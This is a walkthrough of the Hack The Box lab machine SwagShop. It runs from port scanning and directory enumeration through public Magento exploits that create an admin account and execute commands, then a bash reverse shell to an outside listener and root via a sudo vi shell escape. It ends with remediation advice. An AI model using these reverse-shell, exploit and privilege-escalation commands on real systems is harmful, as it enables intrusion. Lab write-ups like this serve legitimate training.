https://www.hackthebox.com/machines/SwagShop

OS: Linux Ubuntu

10.129.229.138

Credentials:

UsernamePasswordNotes/Hash
formeformeafter running exploit to create an account on /admin

nmap results:

# Nmap 7.99 scan initiated Thu Jun  4 15:11:32 2026 as: /usr/lib/nmap/nmap -p- --open -sC -sV -A -vv -oA nmap/SwagShop 10.129.229.138
Nmap scan report for 10.129.229.138
Host is up, received reset ttl 63 (0.017s latency).
Scanned at 2026-06-04 15:11:33 EDT for 23s
Not shown: 65359 closed tcp ports (reset), 174 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCgTCefp89MPJm2oaJqietdslSBur+eCMVQRW19iUL2DQSdZrIctssf/ws4HWN9DuXWB1p7OR9GWQhjeFv+xdb8OLy6EQ72zQOk+cNU9ANi72FZIkpD5A5vHUyhhUSUcnn6hwWMWW4dp6BFVxczAiutSWBVIm2YLmcqwOEOJhfXLVvsVqu8KUmybJQWFaJIeLVHzVgrF1623ekDXMwT7Ktq49RkmqGGE+e4pRy5pWlL2BPVcrSv9nMRDkJTXuoGQ53CRcp9VVi2V7flxTd6547oSPck1N+71Xj/x17sMBDNfwik/Wj3YLjHImAlHNZtSKVUT9Ifqwm973YRV9qtqtGT
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEG18M3bq7HSiI8XlKW9ptWiwOvrIlftuWzPEmynfU6LN26hP/qMJModcHS+idmLoRmZnC5Og9sj5THIf0ZtxPY=
|   256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINmmpsnVsVEZ9KB16eRdxpe75vnX8B/AZMmhrN2i4ES7
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://swagshop.htb/
|_http-favicon: Unknown favicon MD5: 88733EE53676A47FC354A61C32516E82

Attack + Enum Vectors

  • TCP 80: HTTP Apache 2.4.29
  • TCP 22: SSH OpenSSH 7.6p1

UDP (161 SNMP)?

  • UDP 161: Closed

Service Enum Notes:

Web Service: Gobuster / fuff

going to

http://10.129.229.138

it redirected to swagshop.htb, so let’s add that to our /etc/hosts

10.129.229.138 swagshop.htb

Viewing it on Firefox:

http://swagshop.htb/index.php

seems like it is a php server. Maybe we can look some where to inject php code?

On the top right of the web server: it showed Magento, and on the bottom of the page it says © 2014 Magento Demo Store. All Rights Reserved. We take note of these

Let’s run gobuster:

gobuster dir -u http://swagshop.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -r -b 403,404
media                (Status: 200) [Size: 1917]
includes             (Status: 200) [Size: 946]
lib                  (Status: 200) [Size: 2877]
app                  (Status: 200) [Size: 1698]
shell                (Status: 200) [Size: 1547]
skin                 (Status: 200) [Size: 1331]
var                  (Status: 200) [Size: 2097]
errors               (Status: 200) [Size: 2149]
mage                 (Status: 200) [Size: 1319]

in http://swagshop.htb/mage: it showed it is Magento Commerce

Now lets’s search for some public exploits: https://www.exploit-db.com/exploits/37977 this exploit is published on the 2015, given the tag was 2014, it could be usable.

changing the target in the exploit we run it with python2, appearantly not working?

Then I tried registering an account with admin:admin123 and saw the url after log in:

http://swagshop.htb/index.php/customer/account/

seems like the usual directories are under /index.php

going into exploit we see it uses /admin, I’m guessing the URL is specified wrong when using the exploit; let’s try fixing that to http://swagshop.htb/index.php as target

python2 37977.py
WORKED
Check http://swagshop.htb/index.php/admin with creds forme:forme

we then log in as forme on the /admin page


Initial Foothold

Immediately after logging on /admin page we saw Magento ver. 1.9.0.0

Searching that on exploit-db we found: https://www.exploit-db.com/exploits/37811

Since now we have the credentials forme:forme; let’s try leveraging the exploit to see if we can get a reverse shell; first we change the creds to forme:forme in script

python3 37811.py http://swagshop.htb/index.php 'id'

got error, seems like we should run it with python2

python2 37811.py http://swagshop.htb/index.php 'id'
ImportError: No module named mechanize

output: interesting we need a mechanize installed to execute the code

I tried setting up python virtual environment but I don’t think that works with python2? I got lazy so I just googled for newer exploits: Magento 1.9.0.0 exploit rce site:github.com. We found: https://github.com/Hackhoven/Magento-RCE/blob/main/magento-rce-exploit.py which seems like is runnable by python3. Also requires mechanize;

git clone https://github.com/Hackhoven/Magento-RCE/blob/main/magento-rce-exploit.py

let’s set up virtual environment

python3 -m venv venv

activate it:

source venv/bin/activate
python3 -m pip install mechanize

alright we should be able to run code, let’s try

python3 magento-rce-exploit.py http://swagshop.htb/index.php 'id'

didn’t work? hmmm maybe I have to change the target URL?

python3 magento-rce-exploit.py http://swagshop.htb/ 'id'

nope, didn’t work too, how about on /admin?

python3 magento-rce-exploit.py http://swagshop.htb/index.php/admin 'id'

waiting for abit… Aha! We got:

Form name: None
Control name: form_key
Control name: login[username]
Control name: dummy
Control name: login[password]
Control name: None
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Perfect! Now let’s try getting a shell with bash -c wrap: set up listener:

sudo nc -lvnp

call reverse shell:

python3 magento-rce-exploit.py http://swagshop.htb/index.php 'bash -c "bash -i >& /dev/tcp/10.10.15.101/1337 0>&1"'

and.. we got in! Let’s upgrade our shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

then Ctrl + Z to back ground:

stty raw -echo;fg
reset

and add in my tmux rows and columns:

stty rows 48 cols 210

There we go, a fully functioning shell as www-data


Priv Esc

sudo -l

Interesting enough, we can execute sudo as www-data

(root) NOPASSWD: /usr/bin/vi /var/www/html/*

hmmm I recognize the path already, let’s reference GTFOBins vi

Let’s first try to edit a file:

sudo /usr/bin/vi /var/www/html/test.txt

then when we are in vi:

:!/bin/bash

There we go we got root!

Therefore pwn’d


Conclusion & Remediation

Overall was a smooth easy box, the privilege escalation part is very simple yet effective. Exploiting part took a little time to find altternative but also fair.

System administrators should upgrade Magento servers to the latest Magento version since Magento is still vulnerable in higher versions. In addition, vi/vim should not be able to executed as root permissions as that can lead to local privilege escalation to root. Users should be configured with least privileges principle and should not be able to modify files with root privileges any ways.